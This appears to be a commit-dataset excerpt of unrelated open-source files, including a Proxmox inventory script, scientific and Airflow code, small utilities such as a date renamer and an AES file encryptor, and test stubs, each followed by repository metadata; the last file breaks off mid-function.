class ProxmoxQemuList(list):
def get_names(self):
return [qemu['name'] for qemu in self if qemu['template'] != 1]
class ProxmoxPoolList(list):
def get_names(self):
return [pool['poolid'] for pool in self]
class ProxmoxPool(dict):
def get_members_name(self):
return [member['name'] for member in self['members'] if member['template'] != 1]
class ProxmoxAPI(object):
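# Thin wrapper around the Proxmox VE HTTP API: ticket-based authentication
# plus JSON GET requests against the api2/json endpoints.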
def __init__(self, options):
self.options = options
self.credentials = None
if not options.url:
raise Exception('Missing mandatory parameter --url (or PROXMOX_URL).')
elif not options.username:
raise Exception('Missing mandatory parameter --username (or PROXMOX_USERNAME).')
elif not options.password:
raise Exception('Missing mandatory parameter --password (or PROXMOX_PASSWORD).')
def auth(self):
request_path = '{}api2/json/access/ticket'.format(self.options.url)
request_params = urllib.urlencode({
'username': self.options.username,
'password': self.options.password,
})
data = json.load(urllib2.urlopen(request_path, request_params))
self.credentials = {
'ticket': data['data']['ticket'],
'CSRFPreventionToken': data['data']['CSRFPreventionToken'],
}
def get(self, url, data=None):
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PVEAuthCookie={}'.format(self.credentials['ticket'])))
request_path = '{}{}'.format(self.options.url, url)
request = opener.open(request_path, data)
response = json.load(request)
return response['data']
def nodes(self):
return ProxmoxNodeList(self.get('api2/json/nodes'))
def node_qemu(self, node):
return ProxmoxQemuList(self.get('api2/json/nodes/{}/qemu'.format(node)))
def pools(self):
return ProxmoxPoolList(self.get('api2/json/pools'))
def pool(self, poolid):
return ProxmoxPool(self.get('api2/json/pools/{}'.format(poolid)))
def main_list(options):
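# Build the inventory: an 'all' group with every non-template VM,
# plus one group per Proxmox pool.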
result = {}
proxmox_api = ProxmoxAPI(options)
proxmox_api.auth()
# all
result['all'] = []
for node in proxmox_api.nodes().get_names():
result['all'] += proxmox_api.node_qemu(node).get_names()
# pools
for pool in proxmox_api.pools().get_names():
result[pool] = proxmox_api.pool(pool).get_members_name()
print json.dumps(result)
def main_host():
print json.dumps({})
def main():
parser = OptionParser(usage='%prog [options] --list | --host HOSTNAME')
parser.add_option('--list', action="store_true", default=False, dest="list")
parser.add_option('--host', dest="host")
parser.add_option('--url', default=os.environ.get('PROXMOX_URL'), dest='url')
parser.add_option('--username', default=os.environ.get('PROXMOX_USERNAME'), dest='username')
parser.add_option('--password', default=os.environ.get('PROXMOX_PASSWORD'), dest='password')
(options, args) = parser.parse_args()
if options.list:
main_list(options)
elif options.host:
main_host()
else:
parser.print_help()
sys.exit(1)
if __name__ == '__main__':
main()
| mit | Python |
|
1e7421878e90949abc4f6fac5835bd27b472d2b6 | Add example script for the newly added mixed_diffusivity | TomTranter/OpenPNM,PMEAL/OpenPNM | example_Knudsen.py | example_Knudsen.py | import openpnm as op
import numpy as np
import matplotlib.pyplot as plt
# Get Deff w/o including Knudsen effect
spacing = 1.0
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
Deff0 = Mdot * L / A
# Get Deff w/ including Knudsen effect
mdiff = op.models.physics.diffusive_conductance.mixed_diffusivity
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
spacings = np.linspace(1e-9, 1e-4, 20)
spacings = np.logspace(-9, -3, 25)
Deff = []
for spacing in spacings:
np.random.seed(10)
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
Deff.append(Mdot * L / A)
# Plot ratio of Deff w/ Knudsen to that w/o
Deff = np.array(Deff)
plt.figure()
plt.plot(spacings, Deff/Deff0)
plt.xscale("log")
plt.xlabel("spacing (m)")
plt.ylabel("Deff/Deff0")
| mit | Python |
|
a6bbcc46765fee52eba9c31b95d456977fbeeefe | add beautify for print beautify words | seamile/WeedLab,seamile/Weeds,seamile/Weeds,seamile/WeedLab | Scripts/beautify.py | Scripts/beautify.py | #!/usr/bin/env python
import sys
def beautify(line, bold=False):
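# Map ASCII letters to their Unicode mathematical script (or bold script)
# equivalents; any other character is passed through unchanged.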
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
v = '𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏'
bv = '𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃'
chars = dict(zip(k, bv if bold else v))
return ''.join([chars.get(char, char) for char in line])
if __name__ == '__main__':
user_input = ' '.join(sys.argv[1:])
result = beautify(user_input)
print(result)
| mit | Python |
|
ef9b099b1a0f6abe4bde3d74f79d0daa31c38dbd | Add interactive flash size (energy) spectrum plot that can sync to points in 4-panel view | nguy/brawl4d,deeplycloudy/brawl4d | LMA/analysis.py | LMA/analysis.py | """
Get a plot of the flash energy spectrum for flashes in the current brawl4d view.
lma_ctrl is an instance of brawl4d.LMA.controller.LMAController that
>>> from brawl4d.brawl4d import B4D_startup
>>> from datetime import datetime
>>> panels = B4D_startup(basedate=datetime(2012,5,29), ctr_lat=35.2791257, ctr_lon=-97.9178678)
>>> from brawl4d.LMA.controller import LMAController
>>> lma_file = '/data/20120529/flash_sort_prelim/h5_files/2012/May/29/LYLOUT_120529_233000_0600.dat.flash.h5'
>>> lma_ctrl = LMAController()
>>> d, post_filter_brancher, scatter_ctrl, charge_lasso = lma_ctrl.load_hdf5_to_panels(panels, lma_file)
>>> current_events_flashes = lma_ctrl.flash_stats_for_dataset(d, scatter_ctrl.branchpoint)
>>> energy_spectrum_plotter = FlashEnergySpectrumController(bounds_provider=panels)
>>> current_events_flashes.targets.add(energy_spectrum_plotter.inlet)
"""
import numpy as np
from stormdrain.pipeline import coroutine
from stormdrain.support.matplotlib.artistupdaters import LineArtistUpdater
from lmatools.flash_stats import events_flashes_receiver, histogram_for_parameter, energy_plot_setup, calculate_energy_from_area_histogram
class FlashEnergySpectrumController(object):
def __init__(self, coord_names=('length_scale', 'energy'), bin_unit='km', bounds_provider=None):
""" The inlet attribute of this object is a running coroutine ready to receive (events,flashes).
bounds_provider should have a bounds attribute that provides a time coordinate 'time' in seconds
"""
min_pwr = -2
max_pwr = 4
delta_pwr = 0.1
powers = np.arange(min_pwr, max_pwr+delta_pwr, delta_pwr)
footprint_bin_edges = 10**powers
self.coord_names=coord_names
self.bounds_provider = bounds_provider
fig, spectrum_ax, fivethirds_line_artist, spectrum_artist = energy_plot_setup()
self.spectrum_ax=spectrum_ax
self.spectrum_plot_outlet = LineArtistUpdater(spectrum_artist, coord_names=self.coord_names).update()
self.histogrammer = histogram_for_parameter('area', footprint_bin_edges, target=self.calculate_energy(target=self.spectrum_plot_outlet))
self.inlet = events_flashes_receiver(target=self.histogrammer)
@coroutine
def calculate_energy(self, target=None, length_scale_factor=1000.0, t_coord='time'):
""" Presumes the histogram is of area, and that area is in km^2 (as indicated by length_scale_factor) """
xname, yname = self.coord_names
dtype = [(xname,'f4'), (yname,'f4')]
while True:
t_range = self.bounds_provider.bounds[t_coord]
duration = t_range[1] - t_range[0]
histo, bin_edges = (yield)
flash_1d_extent, specific_energy = calculate_energy_from_area_histogram(histo, bin_edges, duration)
if target is not None:
# package energy spectrum as a named array
a = np.empty_like(flash_1d_extent, dtype=dtype)
a[xname]=flash_1d_extent
a[yname]=specific_energy
target.send(a)
self.spectrum_ax.figure.canvas.draw()
#ax.loglog(flash_1d_extent, specific_energy, 'r')
| bsd-2-clause | Python |
|
e1772c008d607a2545ddaa05508b1a74473be0ec | Add TaskInstance index on job_id | asnir/airflow,janczak10/incubator-airflow,KL-WLCR/incubator-airflow,airbnb/airflow,Acehaidrey/incubator-airflow,jhsenjaliya/incubator-airflow,airbnb/airflow,adamhaney/airflow,mrares/incubator-airflow,Fokko/incubator-airflow,skudriashev/incubator-airflow,mistercrunch/airflow,mtagle/airflow,OpringaoDoTurno/airflow,dhuang/incubator-airflow,Twistbioscience/incubator-airflow,MortalViews/incubator-airflow,cjqian/incubator-airflow,artwr/airflow,Twistbioscience/incubator-airflow,wndhydrnt/airflow,bolkedebruin/airflow,yk5/incubator-airflow,bolkedebruin/airflow,lyft/incubator-airflow,jgao54/airflow,gilt/incubator-airflow,hgrif/incubator-airflow,nathanielvarona/airflow,wooga/airflow,sekikn/incubator-airflow,MortalViews/incubator-airflow,fenglu-g/incubator-airflow,ProstoMaxim/incubator-airflow,yk5/incubator-airflow,gtoonstra/airflow,ProstoMaxim/incubator-airflow,mrkm4ntr/incubator-airflow,skudriashev/incubator-airflow,artwr/airflow,akosel/incubator-airflow,gtoonstra/airflow,criccomini/airflow,spektom/incubator-airflow,yati-sagade/incubator-airflow,zack3241/incubator-airflow,apache/incubator-airflow,janczak10/incubator-airflow,CloverHealth/airflow,dmitry-r/incubator-airflow,Acehaidrey/incubator-airflow,lxneng/incubator-airflow,CloverHealth/airflow,wooga/airflow,owlabs/incubator-airflow,wolfier/incubator-airflow,wooga/airflow,MortalViews/incubator-airflow,adamhaney/airflow,adamhaney/airflow,malmiron/incubator-airflow,yati-sagade/incubator-airflow,CloverHealth/airflow,sid88in/incubator-airflow,janczak10/incubator-airflow,edgarRd/incubator-airflow,MetrodataTeam/incubator-airflow,andyxhadji/incubator-airflow,DinoCow/airflow,OpringaoDoTurno/airflow,yati-sagade/incubator-airflow,yk5/incubator-airflow,cfei18/incubator-airflow,cfei18/incubator-airflow,fenglu-g/incubator-airflow,apache/airflow,mrares/incubator-airflow,mrkm4ntr/incubator-airflow,danielvdende/incubator-airflow,akosel/incubator-airflow,apache/airflow,dhuang/incubator-airflow,yati-sagade/incubator-airflow,wndhydrnt/airflow,sergiohgz/incubator-airflow,andyxhadji/incubator-airflow,gilt/incubator-airflow,dhuang/incubator-airflow,bolkedebruin/airflow,jgao54/airflow,KL-WLCR/incubator-airflow,asnir/airflow,gilt/incubator-airflow,edgarRd/incubator-airflow,asnir/airflow,wolfier/incubator-airflow,wolfier/incubator-airflow,apache/airflow,cjqian/incubator-airflow,edgarRd/incubator-airflow,zack3241/incubator-airflow,cfei18/incubator-airflow,mtagle/airflow,ProstoMaxim/incubator-airflow,dhuang/incubator-airflow,cjqian/incubator-airflow,Tagar/incubator-airflow,mrkm4ntr/incubator-airflow,malmiron/incubator-airflow,Twistbioscience/incubator-airflow,lxneng/incubator-airflow,apache/incubator-airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,danielvdende/incubator-airflow,r39132/airflow,janczak10/incubator-airflow,subodhchhabra/airflow,jfantom/incubator-airflow,criccomini/airflow,fenglu-g/incubator-airflow,airbnb/airflow,yk5/incubator-airflow,mistercrunch/airflow,apache/incubator-airflow,owlabs/incubator-airflow,RealImpactAnalytics/airflow,DinoCow/airflow,nathanielvarona/airflow,Acehaidrey/incubator-airflow,KL-WLCR/incubator-airflow,apache/airflow,nathanielvarona/airflow,MetrodataTeam/incubator-airflow,MetrodataTeam/incubator-airflow,sergiohgz/incubator-airflow,malmiron/incubator-airflow,zack3241/incubator-airflow,Tagar/incubator-airflow,skudriashev/incubator-airflow,spektom/incubator-airflow,wileeam/airflow,skudriashev/incubator-airflow,spektom/incubator-airflow,RealIm
pactAnalytics/airflow,jgao54/airflow,lyft/incubator-airflow,mtagle/airflow,sekikn/incubator-airflow,wileeam/airflow,Fokko/incubator-airflow,gtoonstra/airflow,artwr/airflow,akosel/incubator-airflow,artwr/airflow,OpringaoDoTurno/airflow,r39132/airflow,andyxhadji/incubator-airflow,RealImpactAnalytics/airflow,Tagar/incubator-airflow,wndhydrnt/airflow,KL-WLCR/incubator-airflow,jfantom/incubator-airflow,jfantom/incubator-airflow,gtoonstra/airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,mrares/incubator-airflow,hgrif/incubator-airflow,jhsenjaliya/incubator-airflow,danielvdende/incubator-airflow,Tagar/incubator-airflow,sekikn/incubator-airflow,danielvdende/incubator-airflow,lxneng/incubator-airflow,sergiohgz/incubator-airflow,mrkm4ntr/incubator-airflow,adamhaney/airflow,dmitry-r/incubator-airflow,edgarRd/incubator-airflow,danielvdende/incubator-airflow,cfei18/incubator-airflow,r39132/airflow,CloverHealth/airflow,sekikn/incubator-airflow,airbnb/airflow,sid88in/incubator-airflow,lyft/incubator-airflow,criccomini/airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,bolkedebruin/airflow,subodhchhabra/airflow,MortalViews/incubator-airflow,akosel/incubator-airflow,ProstoMaxim/incubator-airflow,jfantom/incubator-airflow,zack3241/incubator-airflow,lxneng/incubator-airflow,fenglu-g/incubator-airflow,Acehaidrey/incubator-airflow,jgao54/airflow,MetrodataTeam/incubator-airflow,r39132/airflow,hgrif/incubator-airflow,wolfier/incubator-airflow,cfei18/incubator-airflow,cfei18/incubator-airflow,nathanielvarona/airflow,hgrif/incubator-airflow,malmiron/incubator-airflow,subodhchhabra/airflow,wndhydrnt/airflow,dmitry-r/incubator-airflow,spektom/incubator-airflow,cjqian/incubator-airflow,mrares/incubator-airflow,DinoCow/airflow,wileeam/airflow,mistercrunch/airflow,RealImpactAnalytics/airflow,subodhchhabra/airflow,bolkedebruin/airflow,Fokko/incubator-airflow,asnir/airflow,Fokko/incubator-airflow,mtagle/airflow,wileeam/airflow,owlabs/incubator-airflow,jhsenjaliya/incubator-airflow,nathanielvarona/airflow,apache/airflow,criccomini/airflow,OpringaoDoTurno/airflow,DinoCow/airflow,apache/airflow,dmitry-r/incubator-airflow,sid88in/incubator-airflow,nathanielvarona/airflow,andyxhadji/incubator-airflow,gilt/incubator-airflow,wooga/airflow,Acehaidrey/incubator-airflow,lyft/incubator-airflow,owlabs/incubator-airflow,apache/incubator-airflow,mistercrunch/airflow | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add ti job_id index
Revision ID: 7171349d4c73
Revises: cc1e65623dc7
Create Date: 2017-08-14 18:08:50.196042
"""
# revision identifiers, used by Alembic.
revision = '7171349d4c73'
down_revision = 'cc1e65623dc7'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_index('ti_job_id', 'task_instance', ['job_id'], unique=False)
def downgrade():
op.drop_index('ti_job_id', table_name='task_instance')
| apache-2.0 | Python |
|
74dee1d09fdc09f93af3d15286336d7face4ba08 | add test file for proper_parens. | constanthatz/data-structures | test_proper_parens.py | test_proper_parens.py | from __future__ import unicode_literals
from proper_parens import check_statement
def test_check_statement():
# Edge cases of strings of length one
value = ")"
assert check_statement(value) == -1
value = "("
assert check_statement(value) == 1
# Edge cases of strings of length two
value = "()"
assert check_statement(value) == 0
# 'Balanced' but broken
value = ")("
assert check_statement(value) == -1
# Broken beginning, middle, and end
value = ")()"
assert check_statement(value) == -1
value = "())()"
assert check_statement(value) == -1
value = "())"
assert check_statement(value) == -1
# Open beginning, middle, and end
value = "(()"
assert check_statement(value) == 1
value = "()(()"
assert check_statement(value) == 1
value = "()("
assert check_statement(value) == 1
| mit | Python |
|
77637c0eca6ba5cd00e8f1fbe863a1fd293c980f | Create __init__.py | aceofwings/Evt-Gateway,aceofwings/Evt-Gateway | tests/CAN/__init__.py | tests/CAN/__init__.py | mit | Python |
||
b936fe0b01a29f8638f662a4a779226fe93cd6fa | Create 5kyu_faulty_odometer.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/5kyu/5kyu_faulty_odometer.py | Solutions/5kyu/5kyu_faulty_odometer.py | BASE = '012356789'
def faulty_odometer(num):
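# The odometer skips every digit 4, so a reading is effectively a base-9
# number whose digits are drawn from BASE; convert it back to the true value.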
result = 0
for i, n in enumerate(str(num)[::-1]):
result += BASE.index(n) * len(BASE) ** i
return result
| mit | Python |
|
ab753bc09d27cc00780d48769d8c12a9015fae18 | Create 0062_siteoption_copyright_notice.py | ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player | radio/migrations/0062_siteoption_copyright_notice.py | radio/migrations/0062_siteoption_copyright_notice.py | # -*- coding: utf-8 -*-
# Save the default COPYRIGHT_NOTICE site option
from __future__ import unicode_literals
from django.db import migrations, models
def set_default_html(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption(name='COPYRIGHT_NOTICE',
value = 'Copyright 2019',
javascript_visible = True,
template_visible = True,
description = 'Edit to update Copyright notice',
).save()
def nothing_to_do(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption.objects.get(name='COPYRIGHT_NOTICE').delete()
class Migration(migrations.Migration):
dependencies = [
('radio', '0061_transmission_has_audio'),
]
operations = [
migrations.RunPython(set_default_html, nothing_to_do),
]
| mit | Python |
|
fa7b12066fd81ed97bb0ecbd13690f850021915f | Create crossover.py | architecture-building-systems/CEAforArcGIS,architecture-building-systems/CEAforArcGIS | cea/optimization/master/crossover.py | cea/optimization/master/crossover.py | """
Crossover routines
"""
from __future__ import division
from deap import tools
from cea.optimization.master.validation import validation_main
def crossover_main(individual, indpb,
column_names,
heating_unit_names_share,
cooling_unit_names_share,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
):
# create a dict mapping each column name to the individual's value
individual_with_name_dict = dict(zip(column_names, individual))
if district_heating_network:
# MUTATE BUILDINGS CONNECTED
buildings_heating = [individual_with_name_dict[column] for column in column_names_buildings_heating]
# apply uniform crossover
buildings_heating_mutated = tools.cxUniform(buildings_heating, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(column_names_buildings_heating, buildings_heating_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
heating_units_share = [individual_with_name_dict[column] for column in heating_unit_names_share]
# apply uniform crossover
heating_units_share_mutated = tools.cxUniform(heating_units_share, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(heating_unit_names_share, heating_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
if district_cooling_network:
# MUTATE BUILDINGS CONNECTED
buildings_cooling = [individual_with_name_dict[column] for column in column_names_buildings_cooling]
# apply uniform crossover
buildings_cooling_mutated = tools.cxUniform(buildings_cooling, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(column_names_buildings_cooling, buildings_cooling_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
cooling_units_share = [individual_with_name_dict[column] for column in cooling_unit_names_share]
# apply uniform crossover
cooling_units_share_mutated = tools.cxUniform(cooling_units_share, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(cooling_unit_names_share, cooling_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
# now validate individual
individual_with_name_dict = validation_main(individual_with_name_dict,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
)
# now pass all the crossed-over values back to the original individual
for i, column in enumerate(column_names):
individual[i] = individual_with_name_dict[column]
return individual,  # trailing comma: DEAP expects a tuple of individuals
| mit | Python |
|
c2509a25eaf3522a55d061f940931447bbf023f1 | test pyCharm | Herne/pythonplayground | lp3thw/ex41.py | lp3thw/ex41.py | import random
from urllib.request import urlopen
import sys
WORD_URL = "http://learncodethehardway.org/words.txt"
WORDS = []
PHRASES = {
"class %%%(%%%):":
"Make a class named %%% that is-a %%%.",
"class %%%(object):\n\tdef __init__(self, ***)":
"class %%% has-a __init__ that takes self and *** params.",
"class %%%(object):\n\tdef ***(self, @@@)":
"class %%% has-a function *** that takes self and @@@ params.",
"*** = %%%()":
"Set *** to an instance of class %%%.",
"***.***(@@@)":
"From *** get the *** function, call it with params self, @@@.",
"***.*** = '***'":
"From *** get the *** attribute and set it to '***'."
}
# do they want to drill phrases first
if len(sys.argv) == 2 and sys.argv[1] == "english":
PHRASES_FIRST = True
else:
PHRASES_FIRST = False
# load up the words from the website
for word in urlopen(WORD_URL).readlines():
WORDS.append(str(word.strip(), encoding="utf-8"))
def convert(snippet, phrase):
class_names = [w.capitalize() for w in
random.sample(WORDS, snippet.count("%%%"))]
other_names = random.sample(WORDS, snippet.count("***"))
results = []
param_names = []
for i in range(0, snippet.count("@@@")):
param_count = random.randint(1, 3)
param_names.append(', '.join(
random.sample(WORDS, param_count)))
for sentence in snippet, phrase:
result = sentence[:]
# fake class names
for word in class_names:
result = result.replace("%%%", word, 1)
# fake other names
for word in other_names:
result = result.replace("***", word, 1)
# fake parameter lists
for word in param_names:
result = result.replace("@@@", word, 1)
results.append(result)
return results
# keep going until they hit CTRL-D
try:
while True:
snippets = list(PHRASES.keys())
random.shuffle(snippets)
for snippet in snippets:
phrase = PHRASES[snippet]
question, answer = convert(snippet, phrase)
if PHRASES_FIRST:
question, answer = answer, question
print(question)
input("> ")
print(f"ANSWER: {answer}\n\n")
except EOFError:
print("\nBye")
| mit | Python |
|
24cfe61a9e1d8ed5a78b2338e652085fc5b3f4e1 | Add example delete | dudymas/python-openstacksdk,mtougeron/python-openstacksdk,mtougeron/python-openstacksdk,dudymas/python-openstacksdk,briancurtin/python-openstacksdk,dtroyer/python-openstacksdk,stackforge/python-openstacksdk,openstack/python-openstacksdk,openstack/python-openstacksdk,dtroyer/python-openstacksdk,briancurtin/python-openstacksdk,stackforge/python-openstacksdk | examples/delete.py | examples/delete.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from examples import common
from examples import session
def run_delete(opts):
sess = session.make_session(opts)
cls = common.find_resource_cls(opts)
data = common.get_data_option(opts)
obj = cls.new(**data)
obj.delete(sess)
print('Deleted: %s' % str(data))
return
if __name__ == "__main__":
opts = common.setup()
sys.exit(common.main(opts, run_delete))
| apache-2.0 | Python |
|
0cb6b839509d3f5ecf0e2196c53decbf6fdac65e | add renameDate.py | 0verchenko/Utils | renameDates.py | renameDates.py | #! Python3
# renameDate.py - rename file names that include a date in US format (MM-DD-YYYY)
# to EU format (DD-MM-YYYY)
import shutil, os, re
#Regex for US dates
datePattern = re.compile(r"""^(.*?) # All text before date
((0|1)?\d)- # one or two month digits
((0|1|2|3)?\d)- # one or two day digits
((19|20)\d\d) # four year digits
(.*?)$ # all text after date
""", re.VERBOSE)
# Loop over the files in the working directory
for amerFilename in os.listdir('.'):
mo = datePattern.search(amerFilename)
# Skip files whose names do not include a date
if mo == None:
continue
# Taking different parts of filename
beforePart = mo.group(1)
monthPart = mo.group(2)
dayPart = mo.group(4)
yearPart = mo.group(6)
afterPart = mo.group(8)
# Forming names in EU format
euroFilename = beforePart + dayPart + '-' + monthPart + '-' + yearPart + afterPart
# Taking full absolute paths to files
absWorkingDir = os.path.abspath('.')
amerFilename = os.path.join(absWorkingDir, amerFilename)
euroFilename = os.path.join(absWorkingDir, euroFilename)
# Renaming files
print('Changing name "%s" to "%s"...' % (amerFilename, euroFilename))
shutil.move(amerFilename, euroFilename) | apache-2.0 | Python |
|
b920103c5aef9fa38d91e2fe0eafaeb8fd18d27b | Create FileEncryptor.py | griffincalme/ExperimentalScripts | FileEncryptor.py | FileEncryptor.py | import os
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto import Random
def encrypt(key, filename):
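# Output layout: 16-byte zero-padded plaintext size, 16-byte IV, then the
# AES-CBC ciphertext written in 64 KiB chunks (space-padded to 16-byte blocks).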
chunksize = 64 * 1024
outputFile = "(encrypted)" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV = Random.new().read(16)
encryptor = AES.new(key, AES.MODE_CBC, IV)
with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))
outfile.write(encryptor.encrypt(chunk))
def decrypt(key, filename):
chunksize = 64 * 1024
outputFile = filename[11:]
with open(filename, 'rb') as infile:
filesize = int(infile.read(16))
IV = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, IV)
with open(outputFile, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(filesize)
def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
def Main():
choice = input("Would you like to (E)ncrypt or (D)ecrypt?: ")
if choice == 'E':
filename = input('File to encrypt: ')
password = input("Password: ")
encrypt(getKey(password), filename)
print("Done.")
elif choice == 'D':
filename = input("File to decrypt: ")
password = input("Password: ")
decrypt(getKey(password), filename)
print("Done")
else:
print("You didn't type E or D, closing....")
if __name__ == '__main__':
Main()
| mit | Python |
|
06e0f140c517e467445a59be989ba3b9ddd76503 | add tests for stdlib xpath | github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | match = "dc:title"
ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
import xml.etree.ElementTree as ET
tree = ET.parse('country_data.xml')
root = tree.getroot()
root.find(match, namespaces=ns) # $ MISSING: getXPath=match
root.findall(match, namespaces=ns) # $ MISSING: getXPath=match
root.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
from xml.etree.ElementTree import ElementTree
tree = ElementTree()
tree.parse("index.xhtml")
tree.find(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findall(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
| mit | Python |
|
70f7096d353ee3edccf6e52e21c6a74db158d906 | Configure settings for py.test | teury/django-multimedia,jbittel/django-multimedia | conftest.py | conftest.py | import os
from django.conf import settings
def pytest_configure():
if not settings.configured:
os.environ['DJANGO_SETTINGS_MODULE'] = 'multimedia.tests.settings'
| bsd-3-clause | Python |
|
4863696bbfb46a836b4febc3397e51dd20214414 | add repoquery-recursive.py for downloading rpm packages and their dependencies exceluding which comes from install media | Zor-X-L/offline-utils,Zor-X-L/offline-utils | repoquery-recursive.py | repoquery-recursive.py | #!/usr/bin/python3
import sys
import subprocess
repoquery = ['repoquery', '--plugins', '--resolve', '--qf',
'%{name}.%{arch} %{repoid} %{location}', '--plugins', '-R']
package_info = dict()
def check_dep(packages):
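# Recursively resolve dependencies with repoquery, recording only packages
# that do not come from the InstallMedia repository.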
#print(packages)
if len(packages) == 0:
return
cmd = repoquery + packages
output = subprocess.check_output(cmd).decode("utf-8")
wait_for_checking = []
for line in output.split('\n'):
if len(line) == 0:
continue
(package_name, repoid, location) = line.split(' ')
if (repoid != 'InstallMedia' and
package_name not in package_info):
package_info[package_name] = (repoid, location)
wait_for_checking.append(package_name)
check_dep(wait_for_checking)
check_dep(sys.argv[1:])
for package in package_info:
print(package_info[package][1])
| mit | Python |
|
0e2504171dc5679b5cdd1cb219ad1cd1e9f29262 | add a test case for performance benchmarking. | axt/angr,tyb0807/angr,f-prettyland/angr,tyb0807/angr,axt/angr,schieb/angr,axt/angr,angr/angr,iamahuman/angr,f-prettyland/angr,tyb0807/angr,chubbymaggie/angr,angr/angr,iamahuman/angr,schieb/angr,chubbymaggie/angr,angr/angr,chubbymaggie/angr,iamahuman/angr,schieb/angr,f-prettyland/angr | tests/perf_unicorn.py | tests/perf_unicorn.py |
import sys
import os
import time
import angr
import simuvex.s_options as so
import nose.tools
test_location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../'))
def perf_unicorn_0():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_0'))
